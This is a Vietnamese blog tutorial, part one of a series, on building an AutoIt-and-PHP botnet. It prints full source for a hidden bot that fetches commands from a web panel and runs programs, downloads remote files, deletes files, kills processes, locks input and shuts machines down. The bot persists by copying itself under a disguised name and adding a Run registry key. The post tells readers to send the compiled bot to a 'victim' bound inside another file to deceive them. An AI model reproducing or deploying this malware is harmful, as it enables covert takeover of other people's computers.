Hôm nay mình sẽ trình bày các bước để tạo ra một con Botnet có khả năng điều khiển máy tính từ xa với các lệnh được lập trình sẵn hoặc các lệnh mở được đóng gói bởi Autoit (download , upload , get process list , print screen ... ) , mình không khuyến khích tạo ra Botnet để thực hiện các hành vi DDOS có quy mô , đánh cắp các thông tin mật , CC ... hay các hành vi phá hoại hệ thống của người khác ...
Bài này dài mình chia làm 2 phần : Botnet PHP và Botnet IRC
Mã nguồn BotnetPHP.au3 :
Code:
;Notrayicon ; ẩn khỏi khay hệ thống
#include <IE.au3>
#include <Inet.au3>
$panel = "http://127.0.0.1/direct.php" ; Đường dẫn đến tập tin lệnh (cùng đường dẫn với botnet.php) , tập tin này sẽ được tự động khỏi tạo bằng php
$CD = DriveGetDrive("ALL")
While (1)
$con = _INetGetSource($panel) ; Đọc lệnh từ $panel
sleep(1000)
if $con then
ExCmd() ; Thực hiện lệnh từ nội dung tập tin đã học
endif
;dangky() ; Ghi khóa lên registry và khởi động cùng hệ thống (chỉ nên sử dụng khi cần thiết)
Sleep(3000)
WEnd
Func ExCmd()
; Phan tich va thuc hien lenh
If StringInStr($con, "RUN#", 2) Then
$cmd = StringSplit($con, "#")
If StringInStr($con, "#SHOW", 2) Then
Run($cmd[2])
Else
Run($cmd[2], "", @SW_HIDE)
EndIf
Sleep(7000)
ElseIf StringInStr($con, "DOWNLOAD#", 2) Then
$cmd = StringSplit($con, "#")
InetGet($cmd[2], $cmd[3], 1, 0)
Sleep(7000)
ElseIf StringInStr($con, "KILL#", 2) Then
$cmd = StringSplit($con, "#")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
Sleep(7000)
ElseIf StringInStr($con, "DELETE#", 2) Then
$cmd = StringSplit($con, "#")
FileDelete($cmd[2])
Sleep(7000)
ElseIf StringInStr($con, "VISIT#", 2) Then
$cmd = StringSplit($con, "#")
if $cmd[3]=='show' then
_IECreate($cmd[2], 0, 1, 1)
else
_IECreate($cmd[2], 0, 0, 1)
endif
Sleep(7000)
ElseIf StringInStr($con, "BOX#", 2) Then
$cmd = StringSplit($con, "#")
MsgBox(16,$cmd[2],$cmd[3])
Sleep(7000)
ElseIf StringInStr($con, "SHUTDOWN", 2) Then
Shutdown(1)
Sleep(7000)
ElseIf StringInStr($con, "RESTART", 2) Then
Shutdown(2)
Sleep(7000)
ElseIf StringInStr($con, "LOCK", 2) Then
BlockInput(1)
Sleep(7000)
ElseIf StringInStr($con, "UNLOCK", 2) Then
BlockInput(0)
Sleep(7000)
ElseIf StringInStr($con, "BEEP", 2) Then
Beep(4000,650)
Sleep(2000)
ElseIf StringInStr($con, "CDOPEN", 2) Then
For $i = 1 to $CD[0]
CDTray($CD[$i],"open")
next
Sleep(3000)
ElseIf StringInStr($con, "CDCLOSE", 2) Then
For $i = 1 to $CD[0]
CDTray($CD[$i],"close")
next
Sleep(3000)
EndIf
EndFunc
Func dangky()
FileCopy(@ScriptFullPath, @AppDataDir & "\cftmon.exe", 1)
RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "cftmon")
If @error Then RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "cftmon", "REG_SZ", @AppDataDir & "\cftmon.exe")
$Open_Regedit = RegRead("HKEY_CLASSES_ROOT\regfile\shell\open\command", "(Default)")
If $Open_Regedit <> 'regedit.exe' Then RegWrite("HKEY_CLASSES_ROOT\regfile\shell\open\command", "(Default)", "REG_SZ", "regedit.exe")
EndFunc
Các bạn có thể tự viết thêm một vài chức năng nữa cho con bot của mình 
Đây là mã nguồn PHP điều khiển :
Đây là mã nguồn PHP điều khiển :
Code:
Code:
<title>BOTNET</title>
<body style='color:#00FF00; background-color: black'>
<center><img src="bot.jpg">
</center>
<p>
<br>
<center>
<form action=# method=POST>
<input type=text name=cmd size=40>
<p>
<input type=submit value=Command>
</form></center>
<p>
<center>
<?php
if (isset($_POST['cmd']))
{
$cmd = $_POST['cmd'];
$fp = fopen('direct.php', 'w');
fwrite($fp, '<?php echo "'.$cmd.'" ?>');
fclose($fp);
echo $cmd;
}
?>
</center>
<form method="POST" action="--WEBBOT-SELF--">
<!--webbot bot="SaveResults" U-File="fpweb:///_private/form_results.csv" S-Format="TEXT/CSV" S-Label-Fields="TRUE" -->
<p align="center">
<textarea rows="6" name="ControlCenter" cols="48" style="font-weight: bold">You type : <?php if (isset($_POST['cmd'])) echo $cmd;?>
Run#(Local Dir or computer file)#(show or default(Hide))
Download#(http://...*.*)#(Local Dir ... *.*)
Delete#(Local Dir to file *.*)
Visit#(http://...)#(show or default(Hide))
Kill#(process not .exe)
Box#(Title)#(message)
SHUTDOWN/RESTART/LOCK/UNLOCK/BEEP/CDOPEN/CDCLOSE
PRINTSCREEN/INFO/POWEROFF/POWERON
</textarea></p>
</form>
<center>
Cách sử dụng rất đơn giản , các bạn upload file botnet.php lên host của mình sau đó sửa lại đúng đường dẫn trong mã nguồn botnetPHP.au3 , compile mã nguồn botnetPHP.au3 và gửi cho victim ... để gắn con botnet này vào một file bất kỳ để qua mặt victim thì các bạn sử dụng công cụ nBinder Pro 5.5 để làm việc này , các bạn tự nghiên cứu công cụ này nhé
- Thử nghiệm
Để thử nghiệm con BotnetPHP này , sau khi các bạn upload file botnet.php lên host và sửa lại dường dẫn thì thực thi botnetPHP sau đó vào trình duyệt gõ http://hostcuaban/botnet.php sẽ hiện ra khung nhập lệnh và bảng chú thích lệnh cho botnet , sau khi command lệnh xong , các bạn bắt buộc phải xóa lệnh vừa command nếu không botnet sẽ thực hiện không ngừng lệnh của bạn ... xóa lệnh bằng cách để trống trong hộp thoại lệnh và nhấn command để tạo một lệnh rỗng ...
Ví dụ lệnh :
Visit#http://xtc.im sẽ mở ra trang web ở chế độ hiển thị ( bỏ #show để thực thi ở chế độ ẩn)
Box#Code by Tommie#Welcome to my Blog! sẽ hiển thị một hộp thoại với title Yagami Raito và nội dung là Welcome to my Blog
Để thực hiện các lệnh mở được đóng gói bởi Autoit thì các bạn sử dụng cấu trúc Execute , chỉ sử dụng cấu trúc này cho khi các bạn đã quen thuộc và nằm lòng các câu lệnh thực thi trong autoit . Sử dụng Execute , các bạn có thể thực thi hàng trăm lệnh cho botnet mà chỉ tốn một hàng lệnh trong mã nguồn ... nhưng đó là vấn đề sau này , khi các bạn đã nằm lòng được một phần căn bản của ngôn ngữ này ... tự khắc sẽ hiểu ^^
Phần sau sẽ là Botnet IRC , con này sẽ quy mô và hay hơn nhiều , các bạn nhớ đón xem
Leech hãy ghi rõ nguồn !
Xin cám ơn !
Không có nhận xét nào: